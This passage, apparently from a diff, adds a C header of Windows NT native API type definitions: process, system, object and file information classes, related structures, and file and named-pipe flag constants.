*PSYSTEM_PROCESSES_INFORMATION; + +typedef enum _PROCESSINFOCLASS { + ProcessBasicInformation = 0, + ProcessQuotaLimits = 1, + ProcessIoCounters = 2, + ProcessVmCounters = 3, + ProcessTimes = 4, + ProcessBasePriority = 5, + ProcessRaisePriority = 6, + ProcessDebugPort = 7, + ProcessExceptionPort = 8, + ProcessAccessToken = 9, + ProcessLdtInformation = 10, + ProcessLdtSize = 11, + ProcessDefaultHardErrorMode = 12, + ProcessIoPortHandlers = 13, + ProcessPooledUsageAndLimits = 14, + ProcessWorkingSetWatch = 15, + ProcessUserModeIOPL = 16, + ProcessEnableAlignmentFaultFixup = 17, + ProcessPriorityClass = 18, + ProcessWx86Information = 19, + ProcessHandleCount = 20, + ProcessAffinityMask = 21, + ProcessPriorityBoost = 22, + ProcessDeviceMap = 23, + ProcessSessionInformation = 24, + ProcessForegroundInformation = 25, + ProcessWow64Information = 26, + ProcessImageFileName = 27, + 
ProcessLUIDDeviceMapsEnabled = 28, + ProcessBreakOnTermination = 29, + ProcessDebugObjectHandle = 30, + ProcessDebugFlags = 31, + ProcessHandleTracing = 32, + ProcessIoPriority = 33, + ProcessExecuteFlags = 34, + ProcessTlsInformation = 35, + ProcessCookie = 36, + ProcessImageInformation = 37, + ProcessCycleTime = 38, + ProcessPagePriority = 39, + ProcessInstrumentationCallback = 40, + ProcessThreadStackAllocation = 41, + ProcessWorkingSetWatchEx = 42, + ProcessImageFileNameWin32 = 43, + ProcessImageFileMapping = 44, + ProcessAffinityUpdateMode = 45, + ProcessMemoryAllocationMode = 46, + ProcessGroupInformation = 47, + ProcessTokenVirtualizationEnabled = 48, + ProcessOwnerInformation = 49, + ProcessWindowInformation = 50, + ProcessHandleInformation = 51, + ProcessMitigationPolicy = 52, + ProcessDynamicFunctionTableInformation = 53, + ProcessHandleCheckingMode = 54, + ProcessKeepAliveCount = 55, + ProcessRevokeFileHandles = 56, + ProcessWorkingSetControl = 57, + ProcessHandleTable = 58, + ProcessCheckStackExtentsMode = 59, + ProcessCommandLineInformation = 60, + ProcessProtectionInformation = 61, + MaxProcessInfoClass = 62 +} PROCESSINFOCLASS; + +typedef struct _PROCESS_BASIC_INFORMATION { + NTSTATUS ExitStatus; + PVOID PebBaseAddress; + ULONG_PTR AffinityMask; + KPRIORITY BasePriority; + ULONG_PTR UniqueProcessId; + ULONG_PTR InheritedFromUniqueProcessId; +} PROCESS_BASIC_INFORMATION; +typedef PROCESS_BASIC_INFORMATION *PPROCESS_BASIC_INFORMATION; + +typedef struct _PROCESS_EXTENDED_BASIC_INFORMATION { + SIZE_T Size; + PROCESS_BASIC_INFORMATION BasicInfo; + union + { + ULONG Flags; + struct + { + ULONG IsProtectedProcess : 1; + ULONG IsWow64Process : 1; + ULONG IsProcessDeleting : 1; + ULONG IsCrossSessionCreate : 1; + ULONG IsFrozen : 1; + ULONG IsBackground : 1; + ULONG IsStronglyNamed : 1; + ULONG SpareBits : 25; + } DUMMYSTRUCTNAME; + } DUMMYUNIONNAME; +} PROCESS_EXTENDED_BASIC_INFORMATION, *PPROCESS_EXTENDED_BASIC_INFORMATION; + +/* +** Processes END +*/ + 
+#ifndef _SYSTEM_INFORMATION_CLASS +typedef enum _SYSTEM_INFORMATION_CLASS +{ + SystemBasicInformation = 0, + SystemProcessorInformation = 1, + SystemPerformanceInformation = 2, + SystemTimeOfDayInformation = 3, + SystemPathInformation = 4, + SystemProcessInformation = 5, + SystemCallCountInformation = 6, + SystemDeviceInformation = 7, + SystemProcessorPerformanceInformation = 8, + SystemFlagsInformation = 9, + SystemCallTimeInformation = 10, + SystemModuleInformation = 11, + SystemLocksInformation = 12, + SystemStackTraceInformation = 13, + SystemPagedPoolInformation = 14, + SystemNonPagedPoolInformation = 15, + SystemHandleInformation = 16, + SystemObjectInformation = 17, + SystemPageFileInformation = 18, + SystemVdmInstemulInformation = 19, + SystemVdmBopInformation = 20, + SystemFileCacheInformation = 21, + SystemPoolTagInformation = 22, + SystemInterruptInformation = 23, + SystemDpcBehaviorInformation = 24, + SystemFullMemoryInformation = 25, + SystemLoadGdiDriverInformation = 26, + SystemUnloadGdiDriverInformation = 27, + SystemTimeAdjustmentInformation = 28, + SystemSummaryMemoryInformation = 29, + SystemMirrorMemoryInformation = 30, + SystemPerformanceTraceInformation = 31, + SystemObsolete0 = 32, + SystemExceptionInformation = 33, + SystemCrashDumpStateInformation = 34, + SystemKernelDebuggerInformation = 35, + SystemContextSwitchInformation = 36, + SystemRegistryQuotaInformation = 37, + SystemExtendServiceTableInformation = 38, + SystemPrioritySeperation = 39, + SystemVerifierAddDriverInformation = 40, + SystemVerifierRemoveDriverInformation = 41, + SystemProcessorIdleInformation = 42, + SystemLegacyDriverInformation = 43, + SystemCurrentTimeZoneInformation = 44, + SystemLookasideInformation = 45, + SystemTimeSlipNotification = 46, + SystemSessionCreate = 47, + SystemSessionDetach = 48, + SystemSessionInformation = 49, + SystemRangeStartInformation = 50, + SystemVerifierInformation = 51, + SystemVerifierThunkExtend = 52, + SystemSessionProcessInformation 
= 53, + SystemLoadGdiDriverInSystemSpace = 54, + SystemNumaProcessorMap = 55, + SystemPrefetcherInformation = 56, + SystemExtendedProcessInformation = 57, + SystemRecommendedSharedDataAlignment = 58, + SystemComPlusPackage = 59, + SystemNumaAvailableMemory = 60, + SystemProcessorPowerInformation = 61, + SystemEmulationBasicInformation = 62, + SystemEmulationProcessorInformation = 63, + SystemExtendedHandleInformation = 64, + SystemLostDelayedWriteInformation = 65, + SystemBigPoolInformation = 66, + SystemSessionPoolTagInformation = 67, + SystemSessionMappedViewInformation = 68, + SystemHotpatchInformation = 69, + SystemObjectSecurityMode = 70, + SystemWatchdogTimerHandler = 71, + SystemWatchdogTimerInformation = 72, + SystemLogicalProcessorInformation = 73, + SystemWow64SharedInformationObsolete = 74, + SystemRegisterFirmwareTableInformationHandler = 75, + SystemFirmwareTableInformation = 76, + SystemModuleInformationEx = 77, + SystemVerifierTriageInformation = 78, + SystemSuperfetchInformation = 79, + SystemMemoryListInformation = 80, + SystemFileCacheInformationEx = 81, + SystemThreadPriorityClientIdInformation = 82, + SystemProcessorIdleCycleTimeInformation = 83, + SystemVerifierCancellationInformation = 84, + SystemProcessorPowerInformationEx = 85, + SystemRefTraceInformation = 86, + SystemSpecialPoolInformation = 87, + SystemProcessIdInformation = 88, + SystemErrorPortInformation = 89, + SystemBootEnvironmentInformation = 90, + SystemHypervisorInformation = 91, + SystemVerifierInformationEx = 92, + SystemTimeZoneInformation = 93, + SystemImageFileExecutionOptionsInformation = 94, + SystemCoverageInformation = 95, + SystemPrefetchPatchInformation = 96, + SystemVerifierFaultsInformation = 97, + SystemSystemPartitionInformation = 98, + SystemSystemDiskInformation = 99, + SystemProcessorPerformanceDistribution = 100, + SystemNumaProximityNodeInformation = 101, + SystemDynamicTimeZoneInformation = 102, + SystemCodeIntegrityInformation = 103, + 
SystemProcessorMicrocodeUpdateInformation = 104, + SystemProcessorBrandString = 105, + SystemVirtualAddressInformation = 106, + SystemLogicalProcessorAndGroupInformation = 107, + SystemProcessorCycleTimeInformation = 108, + SystemStoreInformation = 109, + SystemRegistryAppendString = 110, + SystemAitSamplingValue = 111, + SystemVhdBootInformation = 112, + SystemCpuQuotaInformation = 113, + SystemNativeBasicInformation = 114, + SystemErrorPortTimeouts = 115, + SystemLowPriorityIoInformation = 116, + SystemBootEntropyInformation = 117, + SystemVerifierCountersInformation = 118, + SystemPagedPoolInformationEx = 119, + SystemSystemPtesInformationEx = 120, + SystemNodeDistanceInformation = 121, + SystemAcpiAuditInformation = 122, + SystemBasicPerformanceInformation = 123, + SystemQueryPerformanceCounterInformation = 124, + SystemSessionBigPoolInformation = 125, + SystemBootGraphicsInformation = 126, + SystemScrubPhysicalMemoryInformation = 127, + SystemBadPageInformation = 128, + SystemProcessorProfileControlArea = 129, + SystemCombinePhysicalMemoryInformation = 130, + SystemEntropyInterruptTimingInformation = 131, + SystemConsoleInformation = 132, + SystemPlatformBinaryInformation = 133, + SystemPolicyInformation = 134, + SystemHypervisorProcessorCountInformation = 135, + SystemDeviceDataInformation = 136, + SystemDeviceDataEnumerationInformation = 137, + SystemMemoryTopologyInformation = 138, + SystemMemoryChannelInformation = 139, + SystemBootLogoInformation = 140, + SystemProcessorPerformanceInformationEx = 141, + SystemSpare0 = 142, + SystemSecureBootPolicyInformation = 143, + SystemPageFileInformationEx = 144, + SystemSecureBootInformation = 145, + SystemEntropyInterruptTimingRawInformation = 146, + SystemPortableWorkspaceEfiLauncherInformation = 147, + SystemFullProcessInformation = 148, + SystemKernelDebuggerInformationEx = 149, + SystemBootMetadataInformation = 150, + SystemSoftRebootInformation = 151, + SystemElamCertificateInformation = 152, + 
SystemOfflineDumpConfigInformation = 153, + SystemProcessorFeaturesInformation = 154, + SystemRegistryReconciliationInformation = 155, + SystemEdidInformation = 156, + MaxSystemInfoClass = 157 +} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS; +#endif + +/* +** Timer START +*/ + +// +// Timer APC routine definition. +// + +typedef VOID(*PTIMER_APC_ROUTINE) ( + _In_ PVOID TimerContext, + _In_ ULONG TimerLowValue, + _In_ LONG TimerHighValue + ); + +typedef enum _TIMER_TYPE { + NotificationTimer, + SynchronizationTimer +} TIMER_TYPE; + +#ifndef _TIMER_INFORMATION_CLASS +typedef enum _TIMER_INFORMATION_CLASS { + TimerBasicInformation +} TIMER_INFORMATION_CLASS; +#endif + +#ifndef _TIMER_BASIC_INFORMATION +typedef struct _TIMER_BASIC_INFORMATION { + LARGE_INTEGER RemainingTime; + BOOLEAN TimerState; +} TIMER_BASIC_INFORMATION, *PTIMER_BASIC_INFORMATION; +#endif + +/* +** Timer END +*/ + +typedef VOID(NTAPI *PIO_APC_ROUTINE)( + _In_ PVOID ApcContext, + _In_ PIO_STATUS_BLOCK IoStatusBlock, + _In_ ULONG Reserved + ); + +typedef struct _OBJECT_DIRECTORY_INFORMATION { + UNICODE_STRING Name; + UNICODE_STRING TypeName; +} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; + +#ifndef InitializeObjectAttributes +#define InitializeObjectAttributes( p, n, a, r, s ) { \ + (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ + (p)->RootDirectory = r; \ + (p)->Attributes = a; \ + (p)->ObjectName = n; \ + (p)->SecurityDescriptor = s; \ + (p)->SecurityQualityOfService = NULL; \ + } + +// +// Valid values for the Attributes field +// + +#define OBJ_INHERIT 0x00000002L +#define OBJ_PERMANENT 0x00000010L +#define OBJ_EXCLUSIVE 0x00000020L +#define OBJ_CASE_INSENSITIVE 0x00000040L +#define OBJ_OPENIF 0x00000080L +#define OBJ_OPENLINK 0x00000100L +#define OBJ_KERNEL_HANDLE 0x00000200L +#define OBJ_FORCE_ACCESS_CHECK 0x00000400L +#define OBJ_VALID_ATTRIBUTES 0x000007F2L + +#endif + + +/* +** Objects START +*/ + +#ifndef _OBJECT_INFORMATION_CLASS +typedef enum 
_OBJECT_INFORMATION_CLASS { + ObjectBasicInformation, + ObjectNameInformation, + ObjectTypeInformation, + ObjectTypesInformation, + ObjectHandleFlagInformation, + ObjectSessionInformation, + MaxObjectInfoClass +} OBJECT_INFORMATION_CLASS; +#endif + +#ifndef _OBJECT_BASIC_INFORMATION +typedef struct _OBJECT_BASIC_INFORMATION { + ULONG Attributes; + ACCESS_MASK GrantedAccess; + ULONG HandleCount; + ULONG PointerCount; + ULONG PagedPoolCharge; + ULONG NonPagedPoolCharge; + ULONG Reserved[3]; + ULONG NameInfoSize; + ULONG TypeInfoSize; + ULONG SecurityDescriptorSize; + LARGE_INTEGER CreationTime; +} OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; +#endif + +#ifndef _OBJECT_NAME_INFORMATION +typedef struct _OBJECT_NAME_INFORMATION { + UNICODE_STRING Name; +} OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; +#endif + +#ifndef _OBJECT_TYPE_INFORMATION +typedef struct _OBJECT_TYPE_INFORMATION { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + ULONG PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; +#endif + +typedef struct _OBJECT_TYPE_INFORMATION_8 { + UNICODE_STRING TypeName; + ULONG TotalNumberOfObjects; + ULONG TotalNumberOfHandles; + ULONG TotalPagedPoolUsage; + ULONG TotalNonPagedPoolUsage; + ULONG TotalNamePoolUsage; + ULONG TotalHandleTableUsage; + ULONG HighWaterNumberOfObjects; + ULONG HighWaterNumberOfHandles; + ULONG HighWaterPagedPoolUsage; + ULONG 
HighWaterNonPagedPoolUsage; + ULONG HighWaterNamePoolUsage; + ULONG HighWaterHandleTableUsage; + ULONG InvalidAttributes; + GENERIC_MAPPING GenericMapping; + ULONG ValidAccessMask; + BOOLEAN SecurityRequired; + BOOLEAN MaintainHandleCount; + UCHAR TypeIndex; + CHAR ReservedByte; + ULONG PoolType; + ULONG DefaultPagedPoolCharge; + ULONG DefaultNonPagedPoolCharge; +} OBJECT_TYPE_INFORMATION_8, *POBJECT_TYPE_INFORMATION_8; + +#ifndef _OBJECT_TYPES_INFORMATION +typedef struct _OBJECT_TYPES_INFORMATION +{ + ULONG NumberOfTypes; + OBJECT_TYPE_INFORMATION TypeInformation; +} OBJECT_TYPES_INFORMATION, *POBJECT_TYPES_INFORMATION; +#endif + +#ifndef _OBJECT_HANDLE_FLAG_INFORMATION +typedef struct _OBJECT_HANDLE_FLAG_INFORMATION +{ + BOOLEAN Inherit; + BOOLEAN ProtectFromClose; +} OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; +#endif +/* +** Objects END +*/ + +/* +** File start +*/ + +#define FILE_SUPERSEDE 0x00000000 +#define FILE_OPEN 0x00000001 +#define FILE_CREATE 0x00000002 +#define FILE_OPEN_IF 0x00000003 +#define FILE_OVERWRITE 0x00000004 +#define FILE_OVERWRITE_IF 0x00000005 +#define FILE_MAXIMUM_DISPOSITION 0x00000005 + +#define FILE_DIRECTORY_FILE 0x00000001 +#define FILE_WRITE_THROUGH 0x00000002 +#define FILE_SEQUENTIAL_ONLY 0x00000004 +#define FILE_NO_INTERMEDIATE_BUFFERING 0x00000008 + +#define FILE_SYNCHRONOUS_IO_ALERT 0x00000010 +#define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020 +#define FILE_NON_DIRECTORY_FILE 0x00000040 +#define FILE_CREATE_TREE_CONNECTION 0x00000080 + +#define FILE_COMPLETE_IF_OPLOCKED 0x00000100 +#define FILE_NO_EA_KNOWLEDGE 0x00000200 +#define FILE_OPEN_FOR_RECOVERY 0x00000400 +#define FILE_RANDOM_ACCESS 0x00000800 + +#define FILE_DELETE_ON_CLOSE 0x00001000 +#define FILE_OPEN_BY_FILE_ID 0x00002000 +#define FILE_OPEN_FOR_BACKUP_INTENT 0x00004000 +#define FILE_NO_COMPRESSION 0x00008000 + +#define FILE_RESERVE_OPFILTER 0x00100000 +#define FILE_OPEN_REPARSE_POINT 0x00200000 +#define FILE_OPEN_NO_RECALL 0x00400000 +#define 
FILE_OPEN_FOR_FREE_SPACE_QUERY 0x00800000 + + +#define FILE_COPY_STRUCTURED_STORAGE 0x00000041 +#define FILE_STRUCTURED_STORAGE 0x00000441 + +#define FILE_VALID_OPTION_FLAGS 0x00ffffff +#define FILE_VALID_PIPE_OPTION_FLAGS 0x00000032 +#define FILE_VALID_MAILSLOT_OPTION_FLAGS 0x00000032 +#define FILE_VALID_SET_FLAGS 0x00000036 + +#ifndef _FILE_INFORMATION_CLASS +typedef enum _FILE_INFORMATION_CLASS +{ + FileDirectoryInformation = 1, + FileFullDirectoryInformation, + FileBothDirectoryInformation, + FileBasicInformation, + FileStandardInformation, + FileInternalInformation, + FileEaInformation, + FileAccessInformation, + FileNameInformation, + FileRenameInformation, + FileLinkInformation, + FileNamesInformation, + FileDispositionInformation, + FilePositionInformation, + FileFullEaInformation, + FileModeInformation, + FileAlignmentInformation, + FileAllInformation, + FileAllocationInformation, + FileEndOfFileInformation, + FileAlternateNameInformation, + FileStreamInformation, + FilePipeInformation, + FilePipeLocalInformation, + FilePipeRemoteInformation, + FileMailslotQueryInformation, + FileMailslotSetInformation, + FileCompressionInformation, + FileObjectIdInformation, + FileCompletionInformation, + FileMoveClusterInformation, + FileQuotaInformation, + FileReparsePointInformation, + FileNetworkOpenInformation, + FileAttributeTagInformation, + FileTrackingInformation, + FileIdBothDirectoryInformation, + FileIdFullDirectoryInformation, + FileValidDataLengthInformation, + FileShortNameInformation, + FileIoCompletionNotificationInformation, + FileIoStatusBlockRangeInformation, + FileIoPriorityHintInformation, + FileSfioReserveInformation, + FileSfioVolumeInformation, + FileHardLinkInformation, + FileProcessIdsUsingFileInformation, + FileNormalizedNameInformation, + FileNetworkPhysicalNameInformation, + FileIdGlobalTxDirectoryInformation, + FileMaximumInformation +} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS; +#endif + +#ifndef _FILE_INFORMATION_CLASS +typedef enum 
_FSINFOCLASS { + FileFsVolumeInformation = 1, + FileFsLabelInformation, + FileFsSizeInformation, + FileFsDeviceInformation, + FileFsAttributeInformation, + FileFsControlInformation, + FileFsFullSizeInformation, + FileFsObjectIdInformation, + FileFsDriverPathInformation, + FileFsVolumeFlagsInformation, + FileFsMaximumInformation +} FS_INFORMATION_CLASS, *PFS_INFORMATION_CLASS; +#endif + +typedef struct _FILE_BASIC_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + ULONG FileAttributes; +} FILE_BASIC_INFORMATION, *PFILE_BASIC_INFORMATION; + +typedef struct _FILE_STANDARD_INFORMATION +{ + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG NumberOfLinks; + UCHAR DeletePending; + UCHAR Directory; +} FILE_STANDARD_INFORMATION; + +typedef struct _FILE_INTERNAL_INFORMATION { + LARGE_INTEGER IndexNumber; +} FILE_INTERNAL_INFORMATION, *PFILE_INTERNAL_INFORMATION; + +typedef struct _FILE_EA_INFORMATION { + ULONG EaSize; +} FILE_EA_INFORMATION, *PFILE_EA_INFORMATION; + +typedef struct _FILE_ACCESS_INFORMATION { + ACCESS_MASK AccessFlags; +} FILE_ACCESS_INFORMATION, *PFILE_ACCESS_INFORMATION; + +typedef struct _FILE_POSITION_INFORMATION { + LARGE_INTEGER CurrentByteOffset; +} FILE_POSITION_INFORMATION, *PFILE_POSITION_INFORMATION; + +typedef struct _FILE_MODE_INFORMATION { + ULONG Mode; +} FILE_MODE_INFORMATION, *PFILE_MODE_INFORMATION; + +typedef struct _FILE_ALIGNMENT_INFORMATION { + ULONG AlignmentRequirement; +} FILE_ALIGNMENT_INFORMATION, *PFILE_ALIGNMENT_INFORMATION; + +typedef struct _FILE_NAME_INFORMATION { + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_NAME_INFORMATION, *PFILE_NAME_INFORMATION; + +typedef struct _FILE_ALL_INFORMATION { + FILE_BASIC_INFORMATION BasicInformation; + FILE_STANDARD_INFORMATION StandardInformation; + FILE_INTERNAL_INFORMATION InternalInformation; + FILE_EA_INFORMATION EaInformation; + FILE_ACCESS_INFORMATION AccessInformation; + 
FILE_POSITION_INFORMATION PositionInformation; + FILE_MODE_INFORMATION ModeInformation; + FILE_ALIGNMENT_INFORMATION AlignmentInformation; + FILE_NAME_INFORMATION NameInformation; +} FILE_ALL_INFORMATION, *PFILE_ALL_INFORMATION; + +typedef struct _FILE_NETWORK_OPEN_INFORMATION { + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER AllocationSize; + LARGE_INTEGER EndOfFile; + ULONG FileAttributes; +} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION; + +typedef struct _FILE_ATTRIBUTE_TAG_INFORMATION { + ULONG FileAttributes; + ULONG ReparseTag; +} FILE_ATTRIBUTE_TAG_INFORMATION, *PFILE_ATTRIBUTE_TAG_INFORMATION; + +typedef struct _FILE_ALLOCATION_INFORMATION { + LARGE_INTEGER AllocationSize; +} FILE_ALLOCATION_INFORMATION, *PFILE_ALLOCATION_INFORMATION; + +typedef struct _FILE_COMPRESSION_INFORMATION { + LARGE_INTEGER CompressedFileSize; + USHORT CompressionFormat; + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved[3]; +} FILE_COMPRESSION_INFORMATION, *PFILE_COMPRESSION_INFORMATION; + +typedef struct _FILE_DISPOSITION_INFORMATION { + BOOLEAN DeleteFile; +} FILE_DISPOSITION_INFORMATION, *PFILE_DISPOSITION_INFORMATION; + +typedef struct _FILE_END_OF_FILE_INFORMATION { + LARGE_INTEGER EndOfFile; +} FILE_END_OF_FILE_INFORMATION, *PFILE_END_OF_FILE_INFORMATION; + +typedef struct _FILE_VALID_DATA_LENGTH_INFORMATION { + LARGE_INTEGER ValidDataLength; +} FILE_VALID_DATA_LENGTH_INFORMATION, *PFILE_VALID_DATA_LENGTH_INFORMATION; + +typedef struct _FILE_LINK_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_LINK_INFORMATION, *PFILE_LINK_INFORMATION; + +typedef struct _FILE_MOVE_CLUSTER_INFORMATION { + ULONG ClusterCount; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_MOVE_CLUSTER_INFORMATION, *PFILE_MOVE_CLUSTER_INFORMATION; + +typedef struct 
_FILE_RENAME_INFORMATION { + BOOLEAN ReplaceIfExists; + HANDLE RootDirectory; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_RENAME_INFORMATION, *PFILE_RENAME_INFORMATION; + +typedef struct _FILE_STREAM_INFORMATION { + ULONG NextEntryOffset; + ULONG StreamNameLength; + LARGE_INTEGER StreamSize; + LARGE_INTEGER StreamAllocationSize; + WCHAR StreamName[1]; +} FILE_STREAM_INFORMATION, *PFILE_STREAM_INFORMATION; + +typedef struct _FILE_TRACKING_INFORMATION { + HANDLE DestinationFile; + ULONG ObjectInformationLength; + CHAR ObjectInformation[1]; +} FILE_TRACKING_INFORMATION, *PFILE_TRACKING_INFORMATION; + +typedef struct _FILE_COMPLETION_INFORMATION { + HANDLE Port; + PVOID Key; +} FILE_COMPLETION_INFORMATION, *PFILE_COMPLETION_INFORMATION; + +// +// Define the NamedPipeType flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_BYTE_STREAM_TYPE 0x00000000 +#define FILE_PIPE_MESSAGE_TYPE 0x00000001 + +// +// Define the CompletionMode flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_QUEUE_OPERATION 0x00000000 +#define FILE_PIPE_COMPLETE_OPERATION 0x00000001 + +// +// Define the ReadMode flags for NtCreateNamedPipeFile +// + +#define FILE_PIPE_BYTE_STREAM_MODE 0x00000000 +#define FILE_PIPE_MESSAGE_MODE 0x00000001 + +// +// Define the NamedPipeConfiguration flags for NtQueryInformation +// + +#define FILE_PIPE_INBOUND 0x00000000 +#define FILE_PIPE_OUTBOUND 0x00000001 +#define FILE_PIPE_FULL_DUPLEX 0x00000002 + +// +// Define the NamedPipeState flags for NtQueryInformation +// + +#define FILE_PIPE_DISCONNECTED_STATE 0x00000001 +#define FILE_PIPE_LISTENING_STATE 0x00000002 +#define FILE_PIPE_CONNECTED_STATE 0x00000003 +#define FILE_PIPE_CLOSING_STATE 0x00000004 + +// +// Define the NamedPipeEnd flags for NtQueryInformation +// + +#define FILE_PIPE_CLIENT_END 0x00000000 +#define FILE_PIPE_SERVER_END 0x00000001 + + +typedef struct _FILE_PIPE_INFORMATION { + ULONG ReadMode; + ULONG CompletionMode; +} FILE_PIPE_INFORMATION, *PFILE_PIPE_INFORMATION; + +typedef 
struct _FILE_PIPE_LOCAL_INFORMATION { + ULONG NamedPipeType; + ULONG NamedPipeConfiguration; + ULONG MaximumInstances; + ULONG CurrentInstances; + ULONG InboundQuota; + ULONG ReadDataAvailable; + ULONG OutboundQuota; + ULONG WriteQuotaAvailable; + ULONG NamedPipeState; + ULONG NamedPipeEnd; +} FILE_PIPE_LOCAL_INFORMATION, *PFILE_PIPE_LOCAL_INFORMATION; + +typedef struct _FILE_PIPE_REMOTE_INFORMATION { + LARGE_INTEGER CollectDataTime; + ULONG MaximumCollectionCount; +} FILE_PIPE_REMOTE_INFORMATION, *PFILE_PIPE_REMOTE_INFORMATION; + +typedef struct _FILE_MAILSLOT_QUERY_INFORMATION { + ULONG MaximumMessageSize; + ULONG MailslotQuota; + ULONG NextMessageSize; + ULONG MessagesAvailable; + LARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_QUERY_INFORMATION, *PFILE_MAILSLOT_QUERY_INFORMATION; + +typedef struct _FILE_MAILSLOT_SET_INFORMATION { + PLARGE_INTEGER ReadTimeout; +} FILE_MAILSLOT_SET_INFORMATION, *PFILE_MAILSLOT_SET_INFORMATION; + +typedef struct _FILE_REPARSE_POINT_INFORMATION { + LONGLONG FileReference; + ULONG Tag; +} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION; + +// +// Define the flags for NtSet(Query)EaFile service structure entries +// + +#define FILE_NEED_EA 0x00000080 + +// +// Define EA type values +// + +#define FILE_EA_TYPE_BINARY 0xfffe +#define FILE_EA_TYPE_ASCII 0xfffd +#define FILE_EA_TYPE_BITMAP 0xfffb +#define FILE_EA_TYPE_METAFILE 0xfffa +#define FILE_EA_TYPE_ICON 0xfff9 +#define FILE_EA_TYPE_EA 0xffee +#define FILE_EA_TYPE_MVMT 0xffdf +#define FILE_EA_TYPE_MVST 0xffde +#define FILE_EA_TYPE_ASN1 0xffdd +#define FILE_EA_TYPE_FAMILY_IDS 0xff01 + +typedef struct _FILE_FULL_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR Flags; + UCHAR EaNameLength; + USHORT EaValueLength; + CHAR EaName[1]; +} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION; + +typedef struct _FILE_GET_EA_INFORMATION { + ULONG NextEntryOffset; + UCHAR EaNameLength; + CHAR EaName[1]; +} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION; + +typedef struct 
_FILE_GET_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + SID Sid; +} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION; + +typedef struct _FILE_QUOTA_INFORMATION { + ULONG NextEntryOffset; + ULONG SidLength; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER QuotaUsed; + LARGE_INTEGER QuotaThreshold; + LARGE_INTEGER QuotaLimit; + SID Sid; +} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION; + +typedef struct _FILE_DIRECTORY_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + WCHAR FileName[1]; +} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION; + +typedef struct _FILE_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + WCHAR FileName[1]; +} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION; + +typedef struct _FILE_ID_FULL_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + ULONG EaSize; + LARGE_INTEGER FileId; + WCHAR FileName[1]; +} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION; + +typedef struct _FILE_BOTH_DIR_INFORMATION { + ULONG NextEntryOffset; + ULONG FileIndex; + LARGE_INTEGER CreationTime; + LARGE_INTEGER LastAccessTime; + LARGE_INTEGER LastWriteTime; + LARGE_INTEGER ChangeTime; + LARGE_INTEGER EndOfFile; + LARGE_INTEGER AllocationSize; + ULONG FileAttributes; + ULONG FileNameLength; + 
